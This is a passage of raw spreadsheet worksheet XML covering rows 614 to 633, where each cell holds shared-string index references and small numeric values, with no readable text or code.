      <c r="T614" s="12" t="s">
        <v>4698</v>
      </c>
      <c r="U614" s="12" t="s">
        <v>4699</v>
      </c>
      <c r="V614" s="12" t="s">
        <v>4413</v>
      </c>
      <c r="W614" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X614" s="12">
        <v>4</v>
      </c>
      <c r="Y614" s="12" t="s">
        <v>4700</v>
      </c>
    </row>
    <row r="615" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A615" s="12">
        <v>2748</v>
      </c>
      <c r="B615" s="12" t="s">
        <v>28858</v>
      </c>
      <c r="C615" s="12" t="s">
        <v>28859</v>
      </c>
      <c r="D615" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F615" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G615" s="12" t="s">
        <v>4701</v>
      </c>
      <c r="H615" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I615" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J615" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K615" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L615" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M615" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N615" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O615" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P615" s="12" t="s">
        <v>4624</v>
      </c>
      <c r="Q615" s="12">
        <v>2.6</v>
      </c>
      <c r="R615" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S615" s="12" t="s">
        <v>4702</v>
      </c>
      <c r="T615" s="12" t="s">
        <v>4362</v>
      </c>
      <c r="U615" s="12" t="s">
        <v>4703</v>
      </c>
      <c r="V615" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W615" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X615" s="12">
        <v>2</v>
      </c>
      <c r="Y615" s="12" t="s">
        <v>4705</v>
      </c>
    </row>
    <row r="616" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A616" s="12">
        <v>2751</v>
      </c>
      <c r="B616" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C616" s="12" t="s">
        <v>28860</v>
      </c>
      <c r="D616" s="12" t="s">
        <v>28861</v>
      </c>
      <c r="F616" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G616" s="12" t="s">
        <v>4706</v>
      </c>
      <c r="H616" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I616" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J616" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K616" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L616" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M616" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N616" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O616" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P616" s="12" t="s">
        <v>4624</v>
      </c>
      <c r="Q616" s="12">
        <v>2.6</v>
      </c>
      <c r="R616" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S616" s="12" t="s">
        <v>4707</v>
      </c>
      <c r="T616" s="12" t="s">
        <v>4708</v>
      </c>
      <c r="U616" s="12" t="s">
        <v>4709</v>
      </c>
      <c r="V616" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W616" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X616" s="12">
        <v>10</v>
      </c>
      <c r="Y616" s="12" t="s">
        <v>4710</v>
      </c>
    </row>
    <row r="617" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A617" s="12">
        <v>2755</v>
      </c>
      <c r="B617" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D617" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E617" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F617" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G617" s="12" t="s">
        <v>4711</v>
      </c>
      <c r="H617" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I617" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J617" s="12" t="s">
        <v>2531</v>
      </c>
      <c r="K617" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L617" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M617" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N617" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O617" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P617" s="12" t="s">
        <v>4624</v>
      </c>
      <c r="Q617" s="12">
        <v>2.6</v>
      </c>
      <c r="R617" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S617" s="12" t="s">
        <v>4712</v>
      </c>
      <c r="T617" s="12" t="s">
        <v>4713</v>
      </c>
      <c r="U617" s="12" t="s">
        <v>4714</v>
      </c>
      <c r="V617" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W617" s="12" t="s">
        <v>4715</v>
      </c>
      <c r="X617" s="12">
        <v>14</v>
      </c>
      <c r="Y617" s="12" t="s">
        <v>4716</v>
      </c>
    </row>
    <row r="618" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A618" s="12">
        <v>2758</v>
      </c>
      <c r="B618" s="12" t="s">
        <v>28862</v>
      </c>
      <c r="D618" s="12" t="s">
        <v>28863</v>
      </c>
      <c r="E618" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F618" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G618" s="12" t="s">
        <v>4717</v>
      </c>
      <c r="H618" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I618" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J618" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K618" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L618" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M618" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N618" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O618" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P618" s="12" t="s">
        <v>4718</v>
      </c>
      <c r="Q618" s="12">
        <v>2.6</v>
      </c>
      <c r="R618" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S618" s="12" t="s">
        <v>4719</v>
      </c>
      <c r="T618" s="12" t="s">
        <v>1779</v>
      </c>
      <c r="U618" s="12" t="s">
        <v>4720</v>
      </c>
      <c r="V618" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W618" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X618" s="12">
        <v>0</v>
      </c>
      <c r="Y618" s="12" t="s">
        <v>4721</v>
      </c>
    </row>
    <row r="619" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A619" s="12">
        <v>2764</v>
      </c>
      <c r="B619" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D619" s="12" t="s">
        <v>28864</v>
      </c>
      <c r="F619" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G619" s="12" t="s">
        <v>4728</v>
      </c>
      <c r="H619" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I619" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J619" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K619" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L619" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M619" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N619" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O619" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P619" s="12" t="s">
        <v>4729</v>
      </c>
      <c r="Q619" s="12">
        <v>2.4</v>
      </c>
      <c r="R619" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S619" s="12" t="s">
        <v>4730</v>
      </c>
      <c r="T619" s="12" t="s">
        <v>4731</v>
      </c>
      <c r="U619" s="12" t="s">
        <v>4732</v>
      </c>
      <c r="V619" s="12" t="s">
        <v>1785</v>
      </c>
      <c r="W619" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X619" s="12">
        <v>2</v>
      </c>
      <c r="Y619" s="12" t="s">
        <v>4733</v>
      </c>
    </row>
    <row r="620" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A620" s="12">
        <v>2770</v>
      </c>
      <c r="B620" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D620" s="12" t="s">
        <v>28865</v>
      </c>
      <c r="F620" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G620" s="12" t="s">
        <v>4734</v>
      </c>
      <c r="H620" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I620" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J620" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K620" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L620" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M620" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N620" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O620" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P620" s="12" t="s">
        <v>4735</v>
      </c>
      <c r="Q620" s="12">
        <v>2.6</v>
      </c>
      <c r="R620" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S620" s="12" t="s">
        <v>4736</v>
      </c>
      <c r="T620" s="12" t="s">
        <v>2529</v>
      </c>
      <c r="U620" s="12" t="s">
        <v>4737</v>
      </c>
      <c r="V620" s="12" t="s">
        <v>3916</v>
      </c>
      <c r="W620" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X620" s="12">
        <v>8</v>
      </c>
      <c r="Y620" s="12" t="s">
        <v>4738</v>
      </c>
    </row>
    <row r="621" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A621" s="12">
        <v>2774</v>
      </c>
      <c r="B621" s="12" t="s">
        <v>28866</v>
      </c>
      <c r="C621" s="12" t="s">
        <v>28381</v>
      </c>
      <c r="D621" s="12" t="s">
        <v>28867</v>
      </c>
      <c r="E621" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F621" s="12" t="s">
        <v>29762</v>
      </c>
      <c r="G621" s="12" t="s">
        <v>4739</v>
      </c>
      <c r="H621" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I621" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J621" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K621" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L621" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M621" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N621" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O621" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P621" s="12" t="s">
        <v>4546</v>
      </c>
      <c r="Q621" s="12">
        <v>2.6</v>
      </c>
      <c r="R621" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S621" s="12" t="s">
        <v>4740</v>
      </c>
      <c r="T621" s="12" t="s">
        <v>391</v>
      </c>
      <c r="U621" s="12" t="s">
        <v>4741</v>
      </c>
      <c r="V621" s="12" t="s">
        <v>1923</v>
      </c>
      <c r="W621" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X621" s="12">
        <v>4</v>
      </c>
      <c r="Y621" s="12" t="s">
        <v>4742</v>
      </c>
    </row>
    <row r="622" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A622" s="12">
        <v>2788</v>
      </c>
      <c r="B622" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D622" s="12" t="s">
        <v>28868</v>
      </c>
      <c r="F622" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G622" s="12" t="s">
        <v>4743</v>
      </c>
      <c r="H622" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I622" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J622" s="12" t="s">
        <v>153</v>
      </c>
      <c r="K622" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L622" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M622" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N622" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O622" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P622" s="12" t="s">
        <v>4744</v>
      </c>
      <c r="Q622" s="12">
        <v>2.6</v>
      </c>
      <c r="R622" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S622" s="12" t="s">
        <v>4745</v>
      </c>
      <c r="T622" s="12" t="s">
        <v>4746</v>
      </c>
      <c r="U622" s="12" t="s">
        <v>4747</v>
      </c>
      <c r="V622" s="12" t="s">
        <v>4748</v>
      </c>
      <c r="W622" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X622" s="12">
        <v>5</v>
      </c>
      <c r="Y622" s="12" t="s">
        <v>4749</v>
      </c>
    </row>
    <row r="623" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A623" s="12">
        <v>2793</v>
      </c>
      <c r="B623" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D623" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F623" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G623" s="12" t="s">
        <v>4755</v>
      </c>
      <c r="H623" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I623" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J623" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K623" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L623" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M623" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N623" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O623" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P623" s="12" t="s">
        <v>4546</v>
      </c>
      <c r="Q623" s="12">
        <v>2.6</v>
      </c>
      <c r="R623" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S623" s="12" t="s">
        <v>4756</v>
      </c>
      <c r="T623" s="12" t="s">
        <v>4757</v>
      </c>
      <c r="U623" s="12" t="s">
        <v>4758</v>
      </c>
      <c r="V623" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W623" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X623" s="12">
        <v>3</v>
      </c>
      <c r="Y623" s="12" t="s">
        <v>4759</v>
      </c>
    </row>
    <row r="624" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A624" s="12">
        <v>2802</v>
      </c>
      <c r="B624" s="12" t="s">
        <v>28862</v>
      </c>
      <c r="D624" s="12" t="s">
        <v>28870</v>
      </c>
      <c r="F624" s="12" t="s">
        <v>28864</v>
      </c>
      <c r="G624" s="12" t="s">
        <v>4760</v>
      </c>
      <c r="H624" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I624" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J624" s="12" t="s">
        <v>754</v>
      </c>
      <c r="K624" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L624" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M624" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N624" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O624" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P624" s="12" t="s">
        <v>4761</v>
      </c>
      <c r="Q624" s="12">
        <v>2.4</v>
      </c>
      <c r="R624" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S624" s="12" t="s">
        <v>4762</v>
      </c>
      <c r="T624" s="12" t="s">
        <v>2645</v>
      </c>
      <c r="U624" s="12" t="s">
        <v>4763</v>
      </c>
      <c r="V624" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W624" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X624" s="12">
        <v>13</v>
      </c>
      <c r="Y624" s="12" t="s">
        <v>4764</v>
      </c>
    </row>
    <row r="625" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A625" s="12">
        <v>2815</v>
      </c>
      <c r="B625" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D625" s="12" t="s">
        <v>28863</v>
      </c>
      <c r="E625" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F625" s="12" t="s">
        <v>28871</v>
      </c>
      <c r="G625" s="12" t="s">
        <v>4775</v>
      </c>
      <c r="H625" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I625" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J625" s="12" t="s">
        <v>2488</v>
      </c>
      <c r="K625" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L625" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M625" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N625" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O625" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P625" s="12" t="s">
        <v>4624</v>
      </c>
      <c r="Q625" s="12">
        <v>2.6</v>
      </c>
      <c r="R625" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S625" s="12" t="s">
        <v>4776</v>
      </c>
      <c r="T625" s="12" t="s">
        <v>4777</v>
      </c>
      <c r="U625" s="12" t="s">
        <v>4778</v>
      </c>
      <c r="V625" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W625" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X625" s="12">
        <v>2</v>
      </c>
      <c r="Y625" s="12" t="s">
        <v>4779</v>
      </c>
    </row>
    <row r="626" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A626" s="12">
        <v>2816</v>
      </c>
      <c r="B626" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D626" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F626" s="12" t="s">
        <v>28872</v>
      </c>
      <c r="G626" s="12" t="s">
        <v>4780</v>
      </c>
      <c r="H626" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I626" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J626" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K626" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L626" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M626" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N626" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O626" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P626" s="12" t="s">
        <v>4781</v>
      </c>
      <c r="Q626" s="12">
        <v>2.6</v>
      </c>
      <c r="R626" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S626" s="12" t="s">
        <v>4782</v>
      </c>
      <c r="T626" s="12" t="s">
        <v>4783</v>
      </c>
      <c r="U626" s="12" t="s">
        <v>4784</v>
      </c>
      <c r="V626" s="12" t="s">
        <v>84</v>
      </c>
      <c r="W626" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X626" s="12">
        <v>4</v>
      </c>
      <c r="Y626" s="12" t="s">
        <v>4785</v>
      </c>
    </row>
    <row r="627" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A627" s="12">
        <v>2829</v>
      </c>
      <c r="B627" s="12" t="s">
        <v>28873</v>
      </c>
      <c r="C627" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D627" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E627" s="12" t="s">
        <v>31470</v>
      </c>
      <c r="F627" s="12" t="s">
        <v>28870</v>
      </c>
      <c r="G627" s="12" t="s">
        <v>4795</v>
      </c>
      <c r="H627" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I627" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J627" s="12" t="s">
        <v>36</v>
      </c>
      <c r="K627" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L627" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M627" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N627" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O627" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P627" s="12" t="s">
        <v>4624</v>
      </c>
      <c r="Q627" s="12">
        <v>2.6</v>
      </c>
      <c r="R627" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S627" s="12" t="s">
        <v>4796</v>
      </c>
      <c r="T627" s="12" t="s">
        <v>4797</v>
      </c>
      <c r="U627" s="12" t="s">
        <v>4798</v>
      </c>
      <c r="V627" s="12" t="s">
        <v>4799</v>
      </c>
      <c r="W627" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X627" s="12">
        <v>10</v>
      </c>
      <c r="Y627" s="12" t="s">
        <v>4800</v>
      </c>
    </row>
    <row r="628" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A628" s="12">
        <v>2834</v>
      </c>
      <c r="B628" s="12" t="s">
        <v>28866</v>
      </c>
      <c r="C628" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D628" s="12" t="s">
        <v>28874</v>
      </c>
      <c r="E628" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F628" s="12" t="s">
        <v>28874</v>
      </c>
      <c r="G628" s="12" t="s">
        <v>4801</v>
      </c>
      <c r="H628" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I628" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J628" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K628" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L628" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M628" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N628" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O628" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P628" s="12" t="s">
        <v>4761</v>
      </c>
      <c r="Q628" s="12">
        <v>2.4</v>
      </c>
      <c r="R628" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S628" s="12" t="s">
        <v>4802</v>
      </c>
      <c r="T628" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U628" s="12" t="s">
        <v>4803</v>
      </c>
      <c r="V628" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W628" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X628" s="12">
        <v>2</v>
      </c>
      <c r="Y628" s="12" t="s">
        <v>4804</v>
      </c>
    </row>
    <row r="629" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A629" s="12">
        <v>2835</v>
      </c>
      <c r="B629" s="12" t="s">
        <v>28875</v>
      </c>
      <c r="D629" s="12" t="s">
        <v>28876</v>
      </c>
      <c r="E629" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F629" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G629" s="12" t="s">
        <v>4805</v>
      </c>
      <c r="H629" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I629" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J629" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K629" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L629" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M629" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N629" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O629" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P629" s="12" t="s">
        <v>4806</v>
      </c>
      <c r="Q629" s="12">
        <v>2.4</v>
      </c>
      <c r="R629" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S629" s="12" t="s">
        <v>4807</v>
      </c>
      <c r="T629" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U629" s="12" t="s">
        <v>4808</v>
      </c>
      <c r="V629" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W629" s="12">
        <v>2927</v>
      </c>
      <c r="X629" s="12">
        <v>4</v>
      </c>
      <c r="Y629" s="12" t="s">
        <v>4809</v>
      </c>
    </row>
    <row r="630" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A630" s="12">
        <v>2840</v>
      </c>
      <c r="B630" s="12" t="s">
        <v>28877</v>
      </c>
      <c r="D630" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F630" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G630" s="12" t="s">
        <v>4810</v>
      </c>
      <c r="H630" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I630" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J630" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K630" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L630" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M630" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N630" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O630" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P630" s="12" t="s">
        <v>4624</v>
      </c>
      <c r="Q630" s="12">
        <v>2.6</v>
      </c>
      <c r="R630" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S630" s="12" t="s">
        <v>4811</v>
      </c>
      <c r="T630" s="12" t="s">
        <v>2213</v>
      </c>
      <c r="U630" s="12" t="s">
        <v>4812</v>
      </c>
      <c r="V630" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W630" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X630" s="12">
        <v>4</v>
      </c>
      <c r="Y630" s="12" t="s">
        <v>4813</v>
      </c>
    </row>
    <row r="631" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A631" s="12">
        <v>2856</v>
      </c>
      <c r="B631" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D631" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F631" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G631" s="12" t="s">
        <v>4819</v>
      </c>
      <c r="H631" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I631" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J631" s="12" t="s">
        <v>181</v>
      </c>
      <c r="K631" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L631" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M631" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N631" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O631" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P631" s="12" t="s">
        <v>4820</v>
      </c>
      <c r="Q631" s="12">
        <v>2.6</v>
      </c>
      <c r="R631" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S631" s="12" t="s">
        <v>4821</v>
      </c>
      <c r="T631" s="12" t="s">
        <v>4822</v>
      </c>
      <c r="U631" s="12" t="s">
        <v>4823</v>
      </c>
      <c r="V631" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W631" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X631" s="12">
        <v>18</v>
      </c>
      <c r="Y631" s="12" t="s">
        <v>4824</v>
      </c>
    </row>
    <row r="632" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A632" s="12">
        <v>2859</v>
      </c>
      <c r="B632" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C632" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D632" s="12" t="s">
        <v>28878</v>
      </c>
      <c r="F632" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G632" s="12" t="s">
        <v>4825</v>
      </c>
      <c r="H632" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I632" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J632" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K632" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L632" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M632" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N632" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O632" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P632" s="12" t="s">
        <v>4826</v>
      </c>
      <c r="Q632" s="12">
        <v>2.6</v>
      </c>
      <c r="R632" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S632" s="12" t="s">
        <v>4827</v>
      </c>
      <c r="T632" s="12" t="s">
        <v>46</v>
      </c>
      <c r="U632" s="12" t="s">
        <v>4828</v>
      </c>
      <c r="V632" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W632" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X632" s="12">
        <v>8</v>
      </c>
      <c r="Y632" s="12" t="s">
        <v>4829</v>
      </c>
    </row>
    <row r="633" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A633" s="12">
        <v>2867</v>
      </c>
      <c r="B633" s="12" t="s">
        <v>28879</v>
      </c>
      <c r="D633" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F633" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G633" s="12" t="s">
        <v>4830</v>
      </c>
      <c r="H633" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I633" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J633" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K633" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L633" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M633" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N633" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O633" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P633" s="12" t="s">
        <v>4831</v>
      </c>
      <c r="Q633" s="12">
        <v>2.4</v>
      </c>
      <c r="R633" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S633" s="12" t="s">
        <v>4832</v>
      </c>
      <c r="T633" s="12" t="s">
        <v>4833</v>
      </c>
